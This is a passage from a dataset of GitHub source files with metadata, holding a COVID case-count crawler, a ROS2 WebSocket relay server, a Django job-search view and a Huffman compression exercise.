130, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.json.jsonify", "line_number": 135, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 125, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 125, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 126, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryForm", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 150, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 153, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 157, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 157, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 158, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 158, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 164, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 173, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 173, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 142, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 142, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 143, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects.get_or_404", "line_number": 179, "usage_type": "call"}, {"api_name": "app.auth.models.User.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "app.auth.models.User", "line_number": 179, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryEditForm", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "app.admin.templating.admin_edit", "line_number": 184, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 185, "usage_type": "argument"}, {"api_name": "flask.flash", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 195, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 200, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 201, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 201, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 205, "usage_type": "attribute"}, 
{"api_name": "flask_login.current_user", "line_number": 205, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 213, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 176, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 176, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 177, "usage_type": "name"}]} +{"seq_id": "25955222173", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport datetime, requests, re, os\nfrom num2words import num2words\n\nnumber_dict = {}\nnumber_dict[\"kein\"] = 0\nnumber_dict[\"keine\"] = 0\nnumber_dict[\"keiner\"] = 0\nnumber_dict[\"eine\"] = 1\nnumber_dict[\"einer\"] = 1\n\nfor i in range(1, 501):\n number_dict[ num2words(i, lang='de') ] = i\n \ndef germanWordToInt(w): \n if re.match(\"^[0-9]{1,}$\", w) is not None:\n return int(w)\n else: \n for n in number_dict:\n if ( w.lower() == n ):\n return number_dict[n]\n return False\n \n \ndef getHBNSubPage(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n try:\n r = requests.get('https://www.landkreis-hildburghausen.de' + url.replace(\"&\", \"&\"), headers=headers, allow_redirects=True, timeout=5.0)\n return r.text\n except:\n return False\n \n\ndef getHBNNumbers(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n \n pattern_Subpage = re.compile(r\"([0-9]{1,2}\\.[0-9]{1,2}\\.[0-9]{4,4})\\s*?
.*?Aktuelle\\sFallzahlen.*?
\")\n pattern_date = re.compile(r\"([0-9]{1,})\\.([0-9]{1,}).([0-9]{2,4}),\\s?([0-9]{1,})[\\.:]([0-9]{1,})\") \n \n num_pattern_T = re.compile(r\"\\s([^\\s]*)\\s(?:positiv\\sgetestete\\sPersonen|Personen\\spositiv)\")\n num_pattern_R = re.compile(r\"([^\\.\\s]*)\\sPersonen[^\\.]*?(?:genesen|überstanden)\")\n num_pattern_D = re.compile(r\"\\s([^\\s]*)\\s(?:Todesfall|Todesfälle|Verstorbene|Tote)\")\n \n replace_array = [\"
\", \"
\", \"\", \"\", \"\", \"\", \"\\n\", \"\\t\", \"\\r\" ]\n \n html_replace_dict = {\n \" \": \" \",\n \"ä\": \"ä\",\n \"ö\": \"ö\",\n \"ü\": \"ü\",\n \"Ä\": \"Ä\",\n \"Ö\": \"Ö\",\n \"Ü\": \"Ü\",\n \"ß\": \"ß\"\n }\n \n deceased_cnt = 0\n \n try:\n r = requests.get(url, headers=headers, allow_redirects=True, timeout=5.0)\n \n pmsub = pattern_Subpage.findall( r.text )\n pmsub.reverse() \n \n for pm in pmsub:\n pm_content = getHBNSubPage(pm[1])\n \n for entry in replace_array:\n pm_content = pm_content.replace(entry, \"\")\n \n for entry in html_replace_dict:\n pm_content = pm_content.replace(entry, html_replace_dict[entry])\n \n pd = pattern_date.findall( pm_content )\n \n if ( len(pd) < 1 ):\n continue\n \n timestamp = int(datetime.datetime(int(pd[0][2]), int(pd[0][1]), int(pd[0][0]), int(pd[0][3]) if int(pd[0][3]) < 24 else 23, int(pd[0][4]) ).strftime(\"%s\"))\n \n ps1 = num_pattern_T.findall( pm_content )\n if ( len(ps1) < 0 ):\n continue\n \n num_t = germanWordToInt(ps1[0])\n if num_t is False:\n continue\n \n ps2 = num_pattern_R.findall( pm_content )\n \n num_r = germanWordToInt(ps2[0]) if len(ps2) >= 1 else -1\n if num_r is False:\n num_r = -1\n \n ps3 = num_pattern_D.findall( pm_content )\n num_d = germanWordToInt(ps3[0]) if len(ps3) >= 1 else -1\n if num_d is False: \n num_d = -1\n \n if ( num_d == -1 ):\n num_d = deceased_cnt\n else:\n deceased_cnt = num_d\n \n num_h = -1\n num_s = -1\n \n return [timestamp, num_t, num_r, num_d, num_h, num_s]\n \n except:\n return False \n\n\nif __name__ == \"__main__\":\n \n DATAFILE = os.path.dirname(os.path.realpath(__file__)) + \"/../data/cases_hbn.csv\"\n URL = 'https://www.landkreis-hildburghausen.de/Aktuelles-Covid-19/Aktuelles-zu-Covid-19-im-Landkreis/Aktuelle-Meldungen-aus-dem-Landkreis'\n \n num_latest = getHBNNumbers(URL)\n \n if (num_latest != False) and (num_latest[1] > -1):\n # get old values\n with open(DATAFILE, 'r') as df:\n raw_data = df.read().splitlines()\n last_values = raw_data[-1].split(\",\")[1:6]\n \n # check for changes\n value_changed = False\n for i in enumerate(last_values):\n if ( int(i[1]) != num_latest[i[0]+1] ):\n if ( ( num_latest[i[0]+1] != -1 ) and ( i[0] != 2 ) ):\n value_changed = True\n \n # deceased number is not always included in new reports\n if value_changed:\n num_latest[3] = max(num_latest[3], int(last_values[2]))\n \n if value_changed:\n # write new csv data\n f = open(DATAFILE, 'a')\n f.write(\"%i,%i,%i,%i,%i,%i,%s\\n\" % (num_latest[0], num_latest[1], num_latest[2], num_latest[3], num_latest[4], num_latest[5], URL))\n f.close()\n", "repo_name": "micb25/corona-jena", "sub_path": "crawler/crawler_hbn.py", "file_name": "crawler_hbn.py", "file_ext": "py", "file_size_in_byte": 5061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "53", "api": [{"api_name": "num2words.num2words", "line_number": 15, "usage_type": "call"}, {"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "call"}, 
{"api_name": "os.path.dirname", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "33881369147", "text": "\"\"\"GCS WebUI WebSockets server\n\nListens on several topics to serve WebSocket connections from our GCS WebUI, \nalso publishes to /pathy/dms, on request of the WebUI.\n\nSee /gcs/webui.html in the repo for the client-side part.\nNot to be confused with the Mavlink ground control software (QGroundControl/\nMission Planner).\n\"\"\"\n\nimport sys, base64, json\nfrom enum import Enum\nfrom typing import Any\n\nimport cv2\nimport numpy as np\n\nimport rclpy\nfrom rclpy.node import MsgType, Node\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import String, Empty\n\nimport asyncio\nimport websockets\n\n\ndef opencv_to_b64(img: np.dtype, img_type: str = \"png\") -> str:\n is_success, mask_buf = cv2.imencode(f\".{img_type}\", img)\n if not is_success:\n raise Exception(\"Could not encode image\")\n b64 = base64.b64encode(mask_buf.tobytes()).decode('utf-8')\n return b64\n\ndef b64_to_opencv(b64: str) -> np.dtype:\n img_bytes = base64.b64decode(b64)\n as_np = np.frombuffer(img_bytes, np.uint8)\n img = cv2.imdecode(as_np, cv2.IMREAD_ANYCOLOR)\n return img\n\nclass MessageType(Enum):\n RGB = \"RGB\"\n MASK = \"MASK\"\n PING = \"PING\" # https://stackoverflow.com/questions/10585355/sending-websocket-ping-pong-frame-from-browser\n PONG = \"PONG\"\n DMS = \"DMS\"\n STEER = \"STEER\"\n OFFLOADED_INFERENCE = \"OFFLOADED_INFERENCE\"\n\ndef create_websocket_msg(message_type: MessageType, data: Any):\n return json.dumps({\n \"type\": message_type.value,\n \"data\": data\n })\n\ndef parse_websocket_msg(msg: str):\n msg_obj = json.loads(msg)\n msg_type = MessageType[str(msg_obj[\"type\"])]\n msg_data = msg_obj[\"data\"]\n return msg_type, msg_data\n\ndef async_to_non_blocking(loop: asyncio.AbstractEventLoop, callback):\n def non_blocking_callback(**args): # TODO: args, kargs??\n loop.create_task(callback(**args))\n return non_blocking_callback\n\n\nclass GcsWebuiWsServer(Node):\n def __init__(self):\n super().__init__('gcs_webui_ws_server')\n loop = asyncio.get_event_loop()\n self.create_subscription(\n Image, '/pathy/rgb', async_to_non_blocking(loop, self._on_rgb), 10\n )\n # self.create_subscription(Image, '/pathy/mask', self._on_mask, 10)\n self.create_subscription(\n String, '/pathy/steering', \n async_to_non_blocking(loop, self._on_steering), 10\n )\n self._mask_pub = self.create_publisher(Image, '/pathy/mask', 10)\n self._dms_pub = self.create_publisher(Empty, '/pathy/dms', 10)\n self._bridge = CvBridge()\n self._clients = set()\n self._loop = asyncio.get_event_loop()\n\n async def init(self):\n await self._init_ws()\n self.get_logger().info('Init OK')\n \n async def serve_forever(self):\n self.get_logger().info('Running...')\n while not self.executor or self.executor.context.ok():\n rclpy.spin_once(self, timeout_sec=0)\n await asyncio.sleep(0) # yield\n\n async def _init_ws(self):\n await websockets.serve(self._on_new_client, \"0.0.0.0\", 5678)\n self.get_logger().info('Websocket init OK')\n\n async def _on_rgb(self, img_msg: Image):\n b64_img = opencv_to_b64(\n self._bridge.imgmsg_to_cv2(img_msg), img_type=\"jpg\")\n ws_msg = create_websocket_msg(MessageType.RGB, b64_img)\n await self._send_to_all(ws_msg)\n\n async def _on_mask(self, img_msg: Image):\n img = self._bridge.imgmsg_to_cv2(img_msg)\n await 
self._on_mask_async_parsed(img)\n\n async def _on_mask_async_parsed(self, img: np.dtype):\n return_msg_data = {\n \"type\": MessageType.MASK.value,\n \"data\": opencv_to_b64(img)\n }\n await self._send_to_all(json.dumps(return_msg_data))\n\n def _on_steering(self, msg: String):\n self._loop.create_task(self._on_steering_async(msg))\n\n async def _on_steering_async(self, msg: String):\n msg_obj = json.loads(msg.data)\n return_msg_data = {\n \"type\": MessageType.STEER.value,\n \"data\": {\n \"steer\": msg_obj[\"steer\"],\n \"throttle\": msg_obj[\"throttle\"]\n }\n }\n await self._send_to_all(json.dumps(return_msg_data))\n \n async def _send_to_all(self, data: str):\n if len(self._clients) > 0:\n await asyncio.gather(*[c.send(data) for c in self._clients], return_exceptions=False)\n\n async def _on_new_client(self, socket, path):\n self.get_logger().info('New client')\n self._clients.add(socket)\n try:\n async for msg in socket:\n await self._handle_ws_message(socket, msg)\n except websockets.ConnectionClosedOK:\n self.get_logger().info(\"Goodbye\")\n pass\n finally:\n self._clients.remove(socket)\n\n async def _handle_ws_message(self, socket, msg):\n msg_type, msg_data = parse_websocket_msg(msg)\n if msg_type == MessageType.PING:\n return_msg_data = {\n \"type\": MessageType.PONG,\n \"data\": None\n }\n await socket.send(json.dumps(return_msg_data))\n elif msg_type == MessageType.DMS:\n self.get_logger().info(\"DMS\")\n self._dms_pub.publish(Empty())\n elif msg_type == MessageType.OFFLOADED_INFERENCE:\n self.get_logger().info(\"Offloaded inference\")\n mask = b64_to_opencv(msg_data)\n mask_msg = self._bridge.cv2_to_imgmsg(np.array(mask))\n self._mask_pub.publish(mask_msg)\n await self._on_mask_async_parsed(mask)\n else:\n raise Exception(f\"Unknown message type: {msg_type}\")\n\n\nasync def main_async(args=None):\n rclpy.init(args=args)\n ws_server = GcsWebuiWsServer()\n await ws_server.init()\n await ws_server.serve_forever()\n ws_server.destroy_node()\n rclpy.shutdown()\n\n\ndef main(args=None):\n asyncio.get_event_loop().run_until_complete(main_async(args))\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "repo_name": "ubipo/pathy", "sub_path": "ros/pathy/pathy/gcs_webui_ws_server.py", "file_name": "gcs_webui_ws_server.py", "file_ext": "py", "file_size_in_byte": 6017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.dtype", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 29, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.IMREAD_ANYCOLOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.dtype", "line_number": 35, "usage_type": "attribute"}, {"api_name": "enum.Enum", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 57, "usage_type": "call"}, {"api_name": "asyncio.AbstractEventLoop", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rclpy.node.Node", "line_number": 68, "usage_type": "name"}, 
{"api_name": "asyncio.get_event_loop", "line_number": 71, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 73, "usage_type": "argument"}, {"api_name": "std_msgs.msg.String", "line_number": 77, "usage_type": "argument"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 80, "usage_type": "argument"}, {"api_name": "std_msgs.msg.Empty", "line_number": 81, "usage_type": "argument"}, {"api_name": "cv_bridge.CvBridge", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 84, "usage_type": "call"}, {"api_name": "rclpy.spin_once", "line_number": 93, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "websockets.serve", "line_number": 97, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 100, "usage_type": "name"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.dtype", "line_number": 110, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 115, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 117, "usage_type": "name"}, {"api_name": "std_msgs.msg.String", "line_number": 120, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 129, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 133, "usage_type": "call"}, {"api_name": "websockets.ConnectionClosedOK", "line_number": 141, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "rclpy.init", "line_number": 169, "usage_type": "call"}, {"api_name": "rclpy.shutdown", "line_number": 174, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 178, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 182, "usage_type": "attribute"}]} +{"seq_id": "27921765542", "text": "from django.shortcuts import render\nfrom job_search.models import Job\nfrom .forms import SearchBarForm\n\nfrom django.db.models import Q\n\nfrom functools import reduce\nimport operator\n\n# Create your views here.\n\ndef job_search_index(request):\n jobs = Job.objects.all()\n\n query = \"\"\n results = None\n\n form = SearchBarForm()\n if request.method == 'POST':\n form = SearchBarForm(request.POST)\n if form.is_valid():\n query = form.cleaned_data[\"query\"]\n if ',' in query:\n query = query.split(',')\n else:\n query = query.split(' ')\n\n print(query)\n\n descResults = Job.objects.filter(reduce(operator.and_, [Q(description__icontains=term) for term in query]))\n cityResults = Job.objects.filter(reduce(operator.and_, [Q(city__icontains=term) for term in query]))\n stateResults = Job.objects.filter(reduce(operator.and_, [Q(state__icontains=term) for term in query]))\n results = descResults | cityResults | stateResults\n else:\n form = SearchBarForm()\n\n context = {\n 'jobs': jobs,\n 'form': form,\n 'query': query if query else \"\",\n 'results': results\n }\n return render(request, 'job_search_index.html', context)\n\ndef job_detail(request, pk):\n job = Job.objects.get(pk=pk)\n context = {\n 'job': job\n }\n return render(request, 'job_detail.html', context)", "repo_name": "Gabriel0110/Entry-Level-X", "sub_path": "job_search/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 
1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "job_search.models.Job.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 13, "usage_type": "name"}, {"api_name": "forms.SearchBarForm", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 20, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 30, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 30, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 31, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 31, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 32, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 32, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 32, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.get", "line_number": 46, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "40715480860", "text": "################################################################\n# FILE: hzlib.py\n# WRITER: Roi Greenberg + roigreenberg + 305571234\n# EXERCISE : intro2cs ex9 2013-2014\n# Description: implement some function about Huffman tree and\n# compress and decompress data\n################################################################\n\nimport collections\nfrom bisect import bisect\n'''\nThis module contains several function for compress and decompress data, using\nthe Huffman code algorithm.\n'''\n\nMAGIC = b\"i2cshcfv1\"\nLEFT_TREE = 0\nRIGHT_TREE = 1\n\ndef symbol_count(data):\n \"\"\"the function return dictionary from item to number of returns in data\n Args: data - a data\n \"\"\"\n return collections.Counter(data)\n\n\ndef make_huffman_tree(counter):\n \"\"\"the function create a huffman tree of a given dictionary from item to\n number of returns\n Return tree of tuple of tuples represent the tree or None if dictionary\n is empty\n Args: counter - a 
dictionary (output of symbol_data)\n \"\"\"\n # create a list from the dictonary and sorted it from low repeats to high\n # and high value to low\n sort_list = sorted([(tuple0, counter[tuple0]) for tuple0 in counter], \\\n reverse=True )\n sort_list.sort(key=lambda leaf: leaf[1])\n\n # run until have only 1 tuple\n while len(sort_list) > 1:\n # take the first 2 tuples\n tuple1 = sort_list.pop(0)\n tuple2 = sort_list.pop(0)\n\n # calculate the combined repeats\n count = tuple1[1] + tuple2[1]\n\n #create new tuple of both tuple\n parent = ((tuple2[0], tuple1[0]), count)\n\n #create a list of all the reapets\n counts = [repeats[1] for repeats in sort_list]\n\n #insert the new tuple to the list in the right place\n sort_list.insert(bisect(counts, count), parent)\n\n return sort_list[0][0] if sort_list else None\n\n\ndef build_codebook(huff_tree):\n \"\"\"create a codebook of the Huffman tree\n the function recieve a huffman tree and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n Args:\n huff_tree - a coded tree of a recursive tuple structure\n (same structure of output of privious function).\n bin_item - a string. default is \"\".\n codebook - a dictionary. default is {}.\n \"\"\"\n new_codebook = {}\n def codebook(huff_tree, n=\"\"):\n # return empty dictionary in tree is empty\n if not huff_tree:\n return {}\n # return the dictionary in case tree is only 1 leaf\n elif type(huff_tree) is not tuple:\n return {huff_tree: (1, 0)}\n\n # the left branch\n left=huff_tree[LEFT_TREE]\n # the right branch\n right=huff_tree[RIGHT_TREE]\n\n # if got to leaf, add it to the dictionary\n # if not check the left branch in recursive way\n if type(left) is not tuple:\n binary_info = (len(n + \"0\"), int(n + \"0\", 2))\n new_codebook[left] = binary_info\n else:\n codebook(left, n + \"0\")\n \n # if got to leaf, add it to the dictionary\n # if not check the right branch in recursive way\n if type(right) is not tuple:\n binary_info = (len(n + \"1\"), int(n + \"1\", 2))\n new_codebook[right] = binary_info \n else:\n codebook(right, n + \"1\")\n \n return new_codebook\n return codebook(huff_tree)\n\n \n\ndef build_canonical_codebook(codebook):\n \"\"\"create a canonical codebook of the Huffman tree\n the function recieve a huffman codebook and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n in canonical way\n Args:\n codebook - a dictionary - table of char: code pairs.\"\"\"\n # create a list from the codebook and sorted it from low value to high and\n # low binary length to high \n new_list = sorted([[leaf,codebook[leaf][0]] for leaf in codebook])\n new_list.sort(key=lambda x: x[1])\n \n # return empty codebook if tree is empty\n if not new_list:\n return {}\n # take the length of the first item\n length=new_list[0][1]\n # calculate a new binary code the first item \n code = \"0\" + ''.join(\"0\" for i in range(length - 1))\n # create new dictonary with the first item with new values\n canonical_codebook={new_list[0][0]: (length,int(code,2))}\n # run for every item from the second one\n for item in new_list[1:]:\n # calculate a new binary code the item \n code = bin(int(code,2)+1)[2:]\n # add 0 to the end of the new code if it's length smaller then\n # the previus item code's\n if len(code) < length:\n code=code.zfill(length)\n # take the current length\n length=item[1]\n # add 0 to the begining of the new code if it's length smaller then\n # the original item code's\n 
code=code+\"\".join(\"0\" for i in range(length-len(code)))\n # add the new dictionary the item with new values\n canonical_codebook[item[0]] = (length, int(code, 2))\n \n return canonical_codebook\n\n \ndef build_decodebook(codebook):\n ''' return a dictionary from tuple of length and decimal value of the\n binary code to item built from a dictionary of item to tuple of length\n and decimal value of the binary code\n rgs:\n codebook - a dictionary - table of char: code pairs.\"\"\"\n '''\n # new dictionary\n decodebook = {}\n # add the new dictionary the value as key and key as value\n for item in codebook:\n decodebook[codebook[item]]=item\n return decodebook\n\ndef compress(corpus, codebook):\n \"\"\"the function create an iterator of 0 or 1 as ints, after iterating on\n corpus input.\n\n Args:\n corpus - a sequence of chars by a iterator.\n codebook - a dictionary - table of char: code pairs. \"\"\"\n\n # run for every item in corpus\n for item in corpus:\n # take the length and decimal values according to the codebook\n length = codebook[item][0]\n num = codebook[item][1]\n # convert to binary\n binary = bin(num)[2:].zfill(length)\n # iterator?????\n for char in binary:\n yield int(char)\n\ndef decompress(bits, decodebook):\n \"\"\"the function run over the decoding bits of coded bits input\n and create an iterator of 0 or 1 as an int.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\n decodebook - a dictionary, a decoded one\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n # add the current binary code the next bit\n binary = binary + str(bit)\n # create a tuple of length and decimal value of the binary code\n decode = (len(binary), int(binary, 2))\n # if the binary code is in the decodebook return his value and reset\n # the binary code\n if decode in decodebook:\n yield decodebook[decode]\n binary = \"\"\n\n\ndef pad(bits):\n \"\"\"the function run over each eight sequence bits out of the input,\n adds the 1 as a final bit and appends zeros for the total length be\n divided by 8. 
the function create an iterator of 0 or 1 as an ints.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n binary = binary + str(bit)\n # when binary code have length of 8 return the decimal value and reset\n # the binary code\n if len(binary) == 8:\n yield int(binary, 2)\n binary = \"\"\n # for the last bits, add single 1 and zeros until binary have length of 8\n binary = binary + \"1\"\n while len(binary) != 8:\n binary = binary + \"0\"\n # return the last binary code\n yield int(binary, 2)\n\ndef unpad(byteseq):\n \"\"\"the function run over all bytes of input, taking off the '0' and '1'\n on top of it and create an iterator of 0 or 1 as ints.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n # set a boolin for the first byte\n first = True\n # run for every byte\n for byte in byteseq:\n # for the first byte get his binary value and finish the corrent loop\n if first:\n binary = bin(byte)[2:].zfill(8)\n first = False\n continue\n \n # return every single bit as iterator\n for bit in binary:\n yield int(bit)\n # get the next byte binary value\n binary = bin(byte)[2:].zfill(8)\n # for the last byte, find the last \"1\" digit index\n index = -1\n bit = binary[index]\n while bit != \"1\":\n index -= 1\n bit = binary[index]\n # return the bits up to the last \"1\" digit\n for bit in binary[:index]:\n yield int(bit)\n\ndef join(data, codebook):\n \"\"\"the function run over the bytes of input (first codebook then data)\n and create an iterator of the codebook vals which appear, then the\n data items.\n\n Args:\n data - an iterator, a sequence of bytes.\n codebook - a canonical code table, the output of\n build_canonical_codebook.\"\"\"\n for key in range(256):\n if key in codebook:\n yield codebook[key][0]\n else:\n yield 0\n for data_0 in data:\n yield data_0\n\ndef split(byteseq):\n \"\"\"that function split the output of the function join to data and codebook\n the function return a tuple which is consist of a dictionary - canonical\n coding table and an iterator which iterate over rest of byteseq as\n byte sequent.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n index = 0\n codebook = {}\n data = []\n for byte in byteseq:\n if index < 256:\n if byte != 0:\n codebook[index] = (byte, 0)\n index += 1\n else:\n data.append(byte)\n codebook = build_canonical_codebook(codebook)\n return iter(data), codebook\n \n", "repo_name": "roigreenberg/Introduction-to-Computer-Science-2013-2014", "sub_path": "ex9/hzlib.py", "file_name": "hzlib.py", "file_ext": "py", "file_size_in_byte": 9947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 24, "usage_type": "call"}, {"api_name": "bisect.bisect", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "13437188850", "text": "import argparse, yaml, os, utils, torch, glob, cv2, numpy, time\nfrom pathlib import Path\nfrom models.tokenization_bert import BertTokenizer\nfrom models.model_caption_mplug import MPLUG\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom optim import create_optimizer\nfrom models.vit import resize_pos_embed\nfrom PIL import 